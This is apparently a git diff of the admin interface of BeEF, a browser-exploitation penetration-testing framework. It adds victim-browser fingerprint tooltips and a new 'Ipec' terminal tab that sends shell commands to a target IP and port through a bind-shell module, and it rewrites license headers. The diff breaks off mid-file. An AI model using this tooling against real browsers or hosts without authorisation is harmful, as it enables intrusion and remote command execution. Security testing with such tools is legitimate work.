font-size: 1em; font-family: monospace; padding: 3px; width: 100%; height: 100%; display: block; overflow-x: none; overflow-y: auto; } + +/* TODO: Input Box Width is faulty */ +.wterm_terminal input { background: transparent; border: 0; color: #fff; width: 100%; font-size: 1em; font-family: monospace; outline: none; } +.wterm_terminal div:first { margin-bottom: 1em; } +.wterm_terminal .wterm_prompt { float: left; clear: left; } +.wterm_terminal form { float: left; margin: 0px; width: 75%; } + +/* Themes */ +.wterm_theme_green_on_black { background: #000; color: #0f0; } +.wterm_theme_green_on_black input { background: transparent; border: 0; color: #0f0; } + diff --git a/extensions/admin_ui/media/images/icons/htc.ico b/extensions/admin_ui/media/images/icons/htc.ico new file mode 100644 index 000000000..a4b722423 Binary files /dev/null and b/extensions/admin_ui/media/images/icons/htc.ico differ diff --git a/extensions/admin_ui/media/images/icons/ios.png b/extensions/admin_ui/media/images/icons/ios.png new file mode 100644 index 000000000..a3477139c Binary files /dev/null and b/extensions/admin_ui/media/images/icons/ios.png differ diff --git a/extensions/admin_ui/media/images/icons/iphone.jpg b/extensions/admin_ui/media/images/icons/iphone.jpg new file mode 100644 index 000000000..134b5c9f9 Binary files /dev/null and b/extensions/admin_ui/media/images/icons/iphone.jpg differ diff --git a/extensions/admin_ui/media/images/icons/iphone.png b/extensions/admin_ui/media/images/icons/iphone.png deleted file mode 100644 index ab4a8cc31..000000000 Binary files a/extensions/admin_ui/media/images/icons/iphone.png and /dev/null differ diff --git a/extensions/admin_ui/media/images/icons/kindle.png b/extensions/admin_ui/media/images/icons/kindle.png new file mode 100644 index 000000000..b858fc003 Binary files /dev/null and b/extensions/admin_ui/media/images/icons/kindle.png differ diff --git a/extensions/admin_ui/media/images/icons/motorola.png b/extensions/admin_ui/media/images/icons/motorola.png new file mode 100644 index 000000000..fee6d6e65 Binary files /dev/null and b/extensions/admin_ui/media/images/icons/motorola.png differ diff --git a/extensions/admin_ui/media/images/icons/nexus.png b/extensions/admin_ui/media/images/icons/nexus.png new file mode 100644 index 000000000..16ffc743b Binary files /dev/null and b/extensions/admin_ui/media/images/icons/nexus.png differ diff --git a/extensions/admin_ui/media/images/icons/nokia.ico b/extensions/admin_ui/media/images/icons/nokia.ico new file mode 100644 index 000000000..fe5497301 Binary files /dev/null and b/extensions/admin_ui/media/images/icons/nokia.ico differ diff --git a/extensions/admin_ui/media/images/icons/pc.png b/extensions/admin_ui/media/images/icons/pc.png new file mode 100644 index 000000000..d8f38aca7 Binary files /dev/null and b/extensions/admin_ui/media/images/icons/pc.png differ diff --git a/extensions/admin_ui/media/images/icons/sony_ericsson.png b/extensions/admin_ui/media/images/icons/sony_ericsson.png new file mode 100644 index 000000000..1dab4a8d2 Binary files /dev/null and b/extensions/admin_ui/media/images/icons/sony_ericsson.png differ diff --git a/extensions/admin_ui/media/images/icons/webos.png b/extensions/admin_ui/media/images/icons/webos.png new file mode 100644 index 000000000..d5c0b70d7 Binary files /dev/null and b/extensions/admin_ui/media/images/icons/webos.png differ diff --git a/extensions/admin_ui/media/images/icons/zune.gif b/extensions/admin_ui/media/images/icons/zune.gif new file mode 100644 index 000000000..6d8259b13 Binary files /dev/null and b/extensions/admin_ui/media/images/icons/zune.gif differ diff --git a/extensions/admin_ui/media/javascript/esapi/Class.create.js b/extensions/admin_ui/media/javascript/esapi/Class.create.js index 4c7d8891b..81fc6ad5e 100644 --- a/extensions/admin_ui/media/javascript/esapi/Class.create.js +++ b/extensions/admin_ui/media/javascript/esapi/Class.create.js @@ -1,3 +1,9 @@ +/* + * Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net + * Browser Exploitation Framework (BeEF) - http://beefproject.com + * See the file 'doc/COPYING' for copying permission + */ + /* Simple JavaScript Inheritance * By John Resig http://ejohn.org/ * MIT Licensed. diff --git a/extensions/admin_ui/media/javascript/esapi/jquery-encoder-0.1.0.js b/extensions/admin_ui/media/javascript/esapi/jquery-encoder-0.1.0.js index d120d8c74..d05281662 100644 --- a/extensions/admin_ui/media/javascript/esapi/jquery-encoder-0.1.0.js +++ b/extensions/admin_ui/media/javascript/esapi/jquery-encoder-0.1.0.js @@ -21,7 +21,7 @@ encoded+=': ';} for(var i=0;i=0||hex[cc]==null){encoded+=ch;continue;} +encoded+=encodeURIComponent(input);encoded+=attr?'"':'';return encoded;},encodeForJavascript:function(input){hasBeenInitialized=true;immune=default_immune['js'];var encoded='';for(var i=0;i=0||hex[cc]==null){encoded+=ch;continue;} var temp=cc.toString(16),pad;if(cc<256){pad='00'.substr(temp.length);encoded+='\\x'+pad+temp.toUpperCase();}else{pad='0000'.substr(temp.length);encoded+='\\u'+pad+temp.toUpperCase();}} return encoded;},canonicalize:function(input,strict){hasBeenInitialized=true;if(input===null)return null;var out=input,cycle_out=input;var decodeCount=0,cycles=0;var codecs=[new HTMLEntityCodec(),new PercentCodec(),new CSSCodec()];while(true){cycle_out=out;for(var i=0;i "; - text += " "; - text += zombie_array[index]["ip"]; + + var ip = zombie_array[index]["ip"]; + var session = zombie_array[index]["session"]; + var browser_name = zombie_array[index]["browser_name"]; + var browser_version = zombie_array[index]["browser_version"]; + var browser_icon = zombie_array[index]["browser_icon"]; + var os_icon = zombie_array[index]["os_icon"]; + var os_name = zombie_array[index]["os_name"]; + var hw_name = zombie_array[index]["hw_name"]; + var hw_icon = zombie_array[index]["hw_icon"]; + var domain = zombie_array[index]["domain"]; + var port = zombie_array[index]["port"]; + var has_flash = zombie_array[index]["has_flash"]; + var has_web_sockets = zombie_array[index]["has_web_sockets"]; + var has_googlegears = zombie_array[index]["has_googlegears"]; + var has_java = zombie_array[index]["has_java"]; + var date_stamp = zombie_array[index]["date_stamp"]; + + text = " "; + text+= " "; + text+= " "; + text+= ip; + + balloon_text = "IP: " + ip; + balloon_text+= "
Browser: " + browser_name + " " + browser_version; + balloon_text+= "
System: " + os_name; + balloon_text+= "
Hardware: " + hw_name; + balloon_text+= "
Domain: " + domain + ":" + port; + balloon_text+= "
Flash: " + has_flash; + balloon_text+= "
Java: " + has_java; + balloon_text+= "
Web Sockets: " + has_web_sockets; + balloon_text+= "
Google Gears: " + has_googlegears; + balloon_text+= "
Date: " + date_stamp; var new_zombie = { - 'id' : index, - 'ip' : zombie_array[index]["ip"], - 'session' : zombie_array[index]["session"], - 'text': text, - 'check' : false, - 'domain' : zombie_array[index]["domain"], - 'port' : zombie_array[index]["port"] + 'id' : index, + 'ip' : ip, + 'session' : session, + 'text' : text, + 'balloon_text' : balloon_text, + 'check' : false, + 'domain' : domain, + 'port' : port }; return new_zombie; diff --git a/extensions/admin_ui/media/javascript/ui/panel/common.js b/extensions/admin_ui/media/javascript/ui/panel/common.js index df8129193..8e5f15a71 100644 --- a/extensions/admin_ui/media/javascript/ui/panel/common.js +++ b/extensions/admin_ui/media/javascript/ui/panel/common.js @@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + var zombie_execute_button_text = 'Execute' var zombie_reexecute_button_text = 'Re-execute' var re_execute_command_title = 'Re-execute command' diff --git a/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabCommands.js b/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabCommands.js index bf9bb7357..1a03cf59a 100644 --- a/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabCommands.js +++ b/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabCommands.js @@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + /* * The command tab panel. Listing the list of commands sent to the zombie. * Loaded in /ui/panel/index.html diff --git a/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabDetails.js b/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabDetails.js index 9e038cff2..e80c39d42 100644 --- a/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabDetails.js +++ b/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabDetails.js @@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + /* * The main Tab panel for the selected zombie. */ diff --git a/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabIpec.js b/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabIpec.js new file mode 100644 index 000000000..6f8b2f77f --- /dev/null +++ b/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabIpec.js @@ -0,0 +1,257 @@ +// +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission +// + +/* + * The Ipec Tab panel for the selected zombie. + */ + +ZombieTab_IpecTab = function(zombie) { + + var commands_statusbar = new Beef_StatusBar('ipec-bbar-zombie-'+zombie.session); + + var ipec_config_panel = new Ext.Panel({ + id: 'ipec-config-zombie-'+zombie.session, + title: 'Scan Config', + layout: 'fit', + autoscroll: true + }); + + function get_rest_token(){ + var token = ""; + var url = "/ui/modules/getRestfulApiToken.json"; + $jwterm.ajax({ + contentType: 'application/json', + dataType: 'json', + type: 'GET', + url: url, + async: false, + processData: false, + success: function(data){ + token = data.token; + console.log(token); + }, + error: function(){ + console.log("Error getting RESTful API token"); + } + }); + return token; + } + + function get_module_id(name, token){ + var id = ""; + var url = "/api/modules/search/" + name + "?token=" + token; + $jwterm.ajax({ + contentType: 'application/json', + dataType: 'json', + type: 'GET', + url: url, + async: false, + processData: false, + success: function(data){ + id = data.id; + }, + error: function(){ + console.log("Error getting module id."); + } + }); + return id; + } + + + function escape_html(str) { + str = str.toString(); + str = str.replace(//g, '>'); +// str = str.replace(/\u0022/g, '"'); + str = str.replace(/\u0027/g, '''); + str = str.replace(/\"\"/g, ''); + str = str.replace(/\\r/g, ''); + str = str.replace(/\\n/g, '
'); + str = str.replace(/\\\\/g, '\\'); + str = str.replace(/\\t/g, '    '); +// str = str.replace(/\\/g, '\'); + return str; + } + + function validateNumber(input, min, max) { + var value = parseInt(input); + return (!isNaN(value) && value >= min && value <= max); + } + + + function initTerminal(zombie){ + String.prototype.reverse = function() { + return this.split('').reverse().join(''); + }; + + $jwterm( document ).ready( function() { + $jwterm('#wterm').wterm( { WIDTH: '100%', HEIGHT: '100%', WELCOME_MESSAGE: 'Welcome to BeEF Bind interactive shell. To Begin Using type \'help\'' }); + }); + + var target_ip = ""; + var target_port = ""; + + var command_directory = { + + 'target': function(tokens){ + var ip_regex = new RegExp('^(?:[0-9]{1,3}\.){3}[0-9]{1,3}$'); + target_ip = tokens[1]; + target_port = tokens[2]; + if(ip_regex.test(target_ip) && validateNumber(target_port, 1, 65535)){ + return "Target is now " + tokens[1] + ":" + tokens[2]; + }else{ + return "Target error: invalid IP or port."; + } + }, + + 'exec': function(tokens){ + if(target_ip.length == 0 || target_port.length == 0) + return "Error: target ip or port not set." + + tokens.shift(); //remove the first element (exec) + var cmd = tokens.join(' '); //needed in case of commands with options + cmd = cmd.replace(/\\/g, '\\\\'); //needed to prevent JS errors (\ need to be escaped) + + var token = get_rest_token(); + var mod_id = get_module_id("BeEF_bind_shell", token); + + var uri = "/api/modules/" + zombie.session + "/" + mod_id + "?token=" + token; + + var result = null; + + $jwterm.ajax({ + contentType: 'application/json', + data: JSON.stringify({"rhost":target_ip, "rport":target_port, "path":"/", "cmd":cmd}), + dataType: 'json', + type: 'POST', + url: uri, + async: false, + processData: false, + success: function(data){ + console.log("data: " + data.command_id); + result = "Command [" + data.command_id + "] sent successfully"; + }, + error: function(){ + console.log("Error sending command"); + return "Error sending command"; + } + }); + + return result; + }, + + 'get': function(tokens){ + var command_id = tokens[1]; + + if(command_id != null){ + + var token = get_rest_token(); + var mod_id = get_module_id("BeEF_bind_shell", token); + + var uri_results = "/api/modules/" + zombie.session + "/" + mod_id + "/" + + command_id + "?token=" + token; + var results = ""; + $jwterm.ajax({ + contentType: 'application/json', + dataType: 'json', + type: 'GET', + url: uri_results, + async: false, + processData: false, + success: function(data){ + $jwterm.each(data, function(i){ + console.log("result [" + i +"]: " + $jwterm.parseJSON(data[i].data).data); + results += $jwterm.parseJSON(data[i].data).data; + }); + + }, + error: function(){ + console.log("Error sending command"); + return "Error sending command"; + } + }); + results = escape_html(results); + if(results.charAt(0) == '"' && results.charAt(results.length-1) == '"') + results = results.slice(1,results.length-1); + + return results; + } + }, + + 'strrev': { + PS1: 'strrev $', + + EXIT_HOOK: function() { + return 'exit interface commands'; + }, + + START_HOOK: function() { + return 'exit interface commands'; + }, + + DISPATCH: function( tokens ) { + return tokens.join('').reverse(); + } + } + }; + + for( var j in command_directory ) { + $jwterm.register_command( j, command_directory[j] ); + } + + $jwterm.register_command( 'help', function() { + return 'target - Usage: target <IP> <port> - Send commands to the specified IP:port
' + + 'exec - Usage exec <command> <command options> - Exec a command, returns the command id.
' + + 'get - Usage get <command id> - Retrieve command results given a specified command id.
' + + }); + }; + + + var ipec_terminal_panel = new Ext.Panel({ + id: 'ipec-terminal-zombie-'+zombie.session, + title: 'Terminal', + layout: 'fit', + padding: '1 1 1 1', + autoScroll: true, + html: "
", + listeners: { + afterrender : function(){ + initTerminal(zombie); + } + } + + }); + + function createIpecTerminalPanel(zombie, bar, value) { + + panel = Ext.getCmp('ipec-config-zombie-'+zombie.session); + panel.setTitle('Prompt'); + panel.add(ipec_terminal_panel); + } + + ZombieTab_IpecTab.superclass.constructor.call(this, { + id: 'ipec-log-tab-'+zombie.session, + title: 'Ipec', + activeTab: 0, + viewConfig: { + forceFit: true, + type: 'fit', + autoScroll:true + }, + items: [ipec_config_panel], + bbar: commands_statusbar, + listeners: { + afterrender : function(){ + createIpecTerminalPanel(zombie, commands_statusbar); + }, + autoScroll:true + + } + }); +}; + +Ext.extend(ZombieTab_IpecTab, Ext.TabPanel, {} ); \ No newline at end of file diff --git a/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabLogs.js b/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabLogs.js index e0c8ac7dd..cd57346b2 100644 --- a/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabLogs.js +++ b/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabLogs.js @@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + /* * The log Tab panel for the selected zombie. */ diff --git a/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabRider.js b/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabRider.js index 6d7eaf5dc..ed30b2e8d 100644 --- a/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabRider.js +++ b/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabRider.js @@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + /* * The request Tab panel for the selected zombie. * Loaded in /ui/panel/index.html diff --git a/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabXssRays.js b/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabXssRays.js index 093377010..c9c549e4f 100644 --- a/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabXssRays.js +++ b/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabXssRays.js @@ -1,172 +1,163 @@ -// -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. -// -/* - * The XssRays Tab panel for the selected zombie. - */ - -//TODO: fix positioning issues, probably because we are not creating a nested (fucking) panel -ZombieTab_XssRaysTab = function(zombie) { - - var commands_statusbar = new Beef_StatusBar('xssrays-bbar-zombie-'+zombie.session); - - var req_pagesize = 30; - - var xssrays_config_panel = new Ext.Panel({ - id: 'xssrays-config-zombie-'+zombie.session, - title: 'Scan Config', - layout: 'fit' - }); - - var xssrays_logs_store = new Ext.ux.data.PagingJsonStore({ - storeId: 'xssrays-logs-store-zombie-' + zombie.session, - url: '/ui/xssrays/zombie.json', - remoteSort: false, - autoDestroy: true, - autoLoad: false, - root: 'logs', - - fields: ['id', 'vector_method', 'vector_name', 'vector_poc'], - sortInfo: {field: 'id', direction: 'DESC'}, - - baseParams: { - nonce: Ext.get("nonce").dom.value, - zombie_session: zombie.session - } - }); - - var xssrays_logs_bbar = new Ext.PagingToolbar({ - pageSize: req_pagesize, - store: xssrays_logs_store, - displayInfo: true, - displayMsg: 'Displaying history {0} - {1} of {2}', - emptyMsg: 'No history to display' - }); - - var xssrays_logs_grid = new Ext.grid.GridPanel({ - id: 'xssrays-logs-grid-zombie-' + zombie.session, - store: xssrays_logs_store, - bbar: xssrays_logs_bbar, - border: false, - loadMask: {msg:'Loading History...'}, - - viewConfig: { - forceFit:true - }, - - view: new Ext.grid.GridView({ - forceFit: true, - emptyText: "No History", - enableRowBody:true - }), - - columns: [ - {header: 'Id', width: 10, sortable: true, dataIndex: 'id', hidden:true}, - {header: 'Vector Method', width: 30, sortable: true, dataIndex: 'vector_method', renderer: function(value){return $jEncoder.encoder.encodeForHTML(value)}}, - {header: 'Vector Name', width: 40, sortable: true, dataIndex: 'vector_name', renderer: function(value){return $jEncoder.encoder.encodeForHTML(value)}}, - {header: 'Vector PoC', sortable: true, dataIndex: 'vector_poc', renderer: function(value){return $jEncoder.encoder.encodeForHTML(value)}} - ], - - listeners: { - afterrender: function(datagrid) { - datagrid.store.reload({params:{start:0,limit:req_pagesize, sort: "date", dir:"DESC"}}); - } - } - }); - - var xssrays_logs_panel = new Ext.Panel({ - id: 'xssrays-logs-panel-zombie-'+zombie.session, - title: 'Logs', - items:[xssrays_logs_grid], - layout: 'fit', - - listeners: { - activate: function(xssrays_logs_panel) { - xssrays_logs_panel.items.items[0].store.reload(); - } - } - }); - - function genScanSettingsPanel(zombie, bar, value) { - var form = new Ext.FormPanel({ - title: 'Scan settings', - id: 'xssrays-config-form-zombie'+zombie.session, - url: '/ui/xssrays/createNewScan', - labelWidth: 230, - border: false, - padding: '3px 5px 0 5px', - defaults: {width: 100}, - defaultType: 'textfield', - - items:[{ - fieldLabel: 'Clean Timeout (milliseconds before the injected iFrames are removed from the DOM)', - name: 'clean_timeout', - allowBlank:false, - value: 5000, - padding: '10px 5px 0 5px' - },{ - xtype:'checkbox', - fieldLabel: 'Cross-domain (check for XSS on cross-domain resources)', - name: 'cross_domain', - checked: true - }], - - buttons: [{ - text: 'Start Scan', - handler: function() { - var form = Ext.getCmp('xssrays-config-form-zombie'+zombie.session).getForm(); - - bar.update_sending('Saving settings and ready to start XssRays... ' + zombie.ip + '...'); - - form.submit({ - params: { - nonce: Ext.get("nonce").dom.value, - zombie_session: zombie.session - }, - success: function() { - bar.update_sent("Scan settings saved for hooked browser [" + zombie.ip + "]. XssRays will be added to victim DOM on next polling."); - }, - failure: function() { - bar.update_fail("Error! Something went wrong saving scan settings."); - } - }); - } - }] - }); - - panel = Ext.getCmp('xssrays-config-zombie-'+zombie.session); - panel.setTitle('Scan Config'); - panel.add(form); - } - - ZombieTab_XssRaysTab.superclass.constructor.call(this, { - id: 'xssrays-log-tab-'+zombie.session, - title: 'XssRays', - activeTab: 0, - viewConfig: { - forceFit: true, - type: 'fit' - }, - items: [xssrays_logs_panel, xssrays_config_panel], - bbar: commands_statusbar, - listeners: { - afterrender : function(){ - genScanSettingsPanel(zombie, commands_statusbar); - } - } - }); -}; - +// +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission +// + +/* + * The XssRays Tab panel for the selected zombie. + */ + +//TODO: fix positioning issues, probably because we are not creating a nested (fucking) panel +ZombieTab_XssRaysTab = function(zombie) { + + var commands_statusbar = new Beef_StatusBar('xssrays-bbar-zombie-'+zombie.session); + + var req_pagesize = 30; + + var xssrays_config_panel = new Ext.Panel({ + id: 'xssrays-config-zombie-'+zombie.session, + title: 'Scan Config', + layout: 'fit' + }); + + var xssrays_logs_store = new Ext.ux.data.PagingJsonStore({ + storeId: 'xssrays-logs-store-zombie-' + zombie.session, + url: '/ui/xssrays/zombie.json', + remoteSort: false, + autoDestroy: true, + autoLoad: false, + root: 'logs', + + fields: ['id', 'vector_method', 'vector_name', 'vector_poc'], + sortInfo: {field: 'id', direction: 'DESC'}, + + baseParams: { + nonce: Ext.get("nonce").dom.value, + zombie_session: zombie.session + } + }); + + var xssrays_logs_bbar = new Ext.PagingToolbar({ + pageSize: req_pagesize, + store: xssrays_logs_store, + displayInfo: true, + displayMsg: 'Displaying history {0} - {1} of {2}', + emptyMsg: 'No history to display' + }); + + var xssrays_logs_grid = new Ext.grid.GridPanel({ + id: 'xssrays-logs-grid-zombie-' + zombie.session, + store: xssrays_logs_store, + bbar: xssrays_logs_bbar, + border: false, + loadMask: {msg:'Loading History...'}, + + viewConfig: { + forceFit:true + }, + + view: new Ext.grid.GridView({ + forceFit: true, + emptyText: "No History", + enableRowBody:true + }), + + columns: [ + {header: 'Id', width: 10, sortable: true, dataIndex: 'id', hidden:true}, + {header: 'Vector Method', width: 30, sortable: true, dataIndex: 'vector_method', renderer: function(value){return $jEncoder.encoder.encodeForHTML(value)}}, + {header: 'Vector Name', width: 40, sortable: true, dataIndex: 'vector_name', renderer: function(value){return $jEncoder.encoder.encodeForHTML(value)}}, + {header: 'Vector PoC', sortable: true, dataIndex: 'vector_poc', renderer: function(value){return $jEncoder.encoder.encodeForHTML(value)}} + ], + + listeners: { + afterrender: function(datagrid) { + datagrid.store.reload({params:{start:0,limit:req_pagesize, sort: "date", dir:"DESC"}}); + } + } + }); + + var xssrays_logs_panel = new Ext.Panel({ + id: 'xssrays-logs-panel-zombie-'+zombie.session, + title: 'Logs', + items:[xssrays_logs_grid], + layout: 'fit', + + listeners: { + activate: function(xssrays_logs_panel) { + xssrays_logs_panel.items.items[0].store.reload(); + } + } + }); + + function genScanSettingsPanel(zombie, bar, value) { + var form = new Ext.FormPanel({ + title: 'Scan settings', + id: 'xssrays-config-form-zombie'+zombie.session, + url: '/ui/xssrays/createNewScan', + labelWidth: 230, + border: false, + padding: '3px 5px 0 5px', + defaults: {width: 100}, + defaultType: 'textfield', + + items:[{ + fieldLabel: 'Clean Timeout (milliseconds before the injected iFrames are removed from the DOM)', + name: 'clean_timeout', + allowBlank:false, + value: 5000, + padding: '10px 5px 0 5px' + },{ + xtype:'checkbox', + fieldLabel: 'Cross-domain (check for XSS on cross-domain resources)', + name: 'cross_domain', + checked: true + }], + + buttons: [{ + text: 'Start Scan', + handler: function() { + var form = Ext.getCmp('xssrays-config-form-zombie'+zombie.session).getForm(); + + bar.update_sending('Saving settings and ready to start XssRays... ' + zombie.ip + '...'); + + form.submit({ + params: { + nonce: Ext.get("nonce").dom.value, + zombie_session: zombie.session + }, + success: function() { + bar.update_sent("Scan settings saved for hooked browser [" + zombie.ip + "]. XssRays will be added to victim DOM on next polling."); + }, + failure: function() { + bar.update_fail("Error! Something went wrong saving scan settings."); + } + }); + } + }] + }); + + panel = Ext.getCmp('xssrays-config-zombie-'+zombie.session); + panel.setTitle('Scan Config'); + panel.add(form); + } + + ZombieTab_XssRaysTab.superclass.constructor.call(this, { + id: 'xssrays-log-tab-'+zombie.session, + title: 'XssRays', + activeTab: 0, + viewConfig: { + forceFit: true, + type: 'fit' + }, + items: [xssrays_logs_panel, xssrays_config_panel], + bbar: commands_statusbar, + listeners: { + afterrender : function(){ + genScanSettingsPanel(zombie, commands_statusbar); + } + } + }); +}; + Ext.extend(ZombieTab_XssRaysTab, Ext.TabPanel, {} ); \ No newline at end of file diff --git a/extensions/admin_ui/media/javascript/ui/panel/zombiesTreeList.js b/extensions/admin_ui/media/javascript/ui/panel/zombiesTreeList.js index 5537ee34e..1af9cf2c9 100644 --- a/extensions/admin_ui/media/javascript/ui/panel/zombiesTreeList.js +++ b/extensions/admin_ui/media/javascript/ui/panel/zombiesTreeList.js @@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + /* * The zombie panel located on the left hand side of the interface. */ @@ -36,6 +27,7 @@ zombiesTreeList = function(id) { //the tree node that contains the list of online hooked browsers this.online_hooked_browsers_treenode = this.root.appendChild( new Ext.tree.TreeNode({ + qtip: "Online hooked browsers", text:'Online Browsers', cls:'online-zombies-node', expanded:true @@ -45,6 +37,7 @@ zombiesTreeList = function(id) { //the tree node that contains the list of offline hooked browsers this.offline_hooked_browsers_treenode = this.root.appendChild( new Ext.tree.TreeNode({ + qtip: "Offline hooked browsers", text:'Offline Browsers', cls:'offline-zombies-node', expanded:false @@ -183,7 +176,7 @@ Ext.extend(zombiesTreeList, Ext.tree.TreePanel, { */ addZombie: function(hooked_browser, online, checkbox) { var hb_id, mother_node, node; - + if(online) { hb_id = 'zombie-online-' + hooked_browser.session; mother_node = this.online_hooked_browsers_treenode; @@ -193,7 +186,9 @@ Ext.extend(zombiesTreeList, Ext.tree.TreePanel, { } var exists = this.getNodeById(hb_id); if(exists) return; - + + hooked_browser.qtip = hooked_browser.balloon_text; + //save a new online HB if(online && Ext.pluck(this.online_hooked_browsers_array, 'session').indexOf(hooked_browser.session)==-1) { this.online_hooked_browsers_array.push(hooked_browser); @@ -216,7 +211,7 @@ Ext.extend(zombiesTreeList, Ext.tree.TreePanel, { //creates a new node for that hooked browser node = new Ext.tree.TreeNode(hooked_browser); - + //creates a sub-branch for that HB if necessary mother_node = this.addSubFolder(mother_node, hooked_browser[this.tree_configuration['sub-branch']], checkbox); @@ -253,6 +248,7 @@ Ext.extend(zombiesTreeList, Ext.tree.TreePanel, { sub_folder_node = new Ext.tree.TreeNode({ id: 'sub-folder-'+folder, text: folder, + qtip: "Browsers hooked on "+folder, checked: ((checkbox) ? false : null), type: this.tree_configuration["sub-branch"] }); diff --git a/extensions/admin_ui/media/javascript/ux/PagingStore.js b/extensions/admin_ui/media/javascript/ux/PagingStore.js index d8c66b236..0536b4131 100644 --- a/extensions/admin_ui/media/javascript/ux/PagingStore.js +++ b/extensions/admin_ui/media/javascript/ux/PagingStore.js @@ -1,568 +1,559 @@ -// -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use 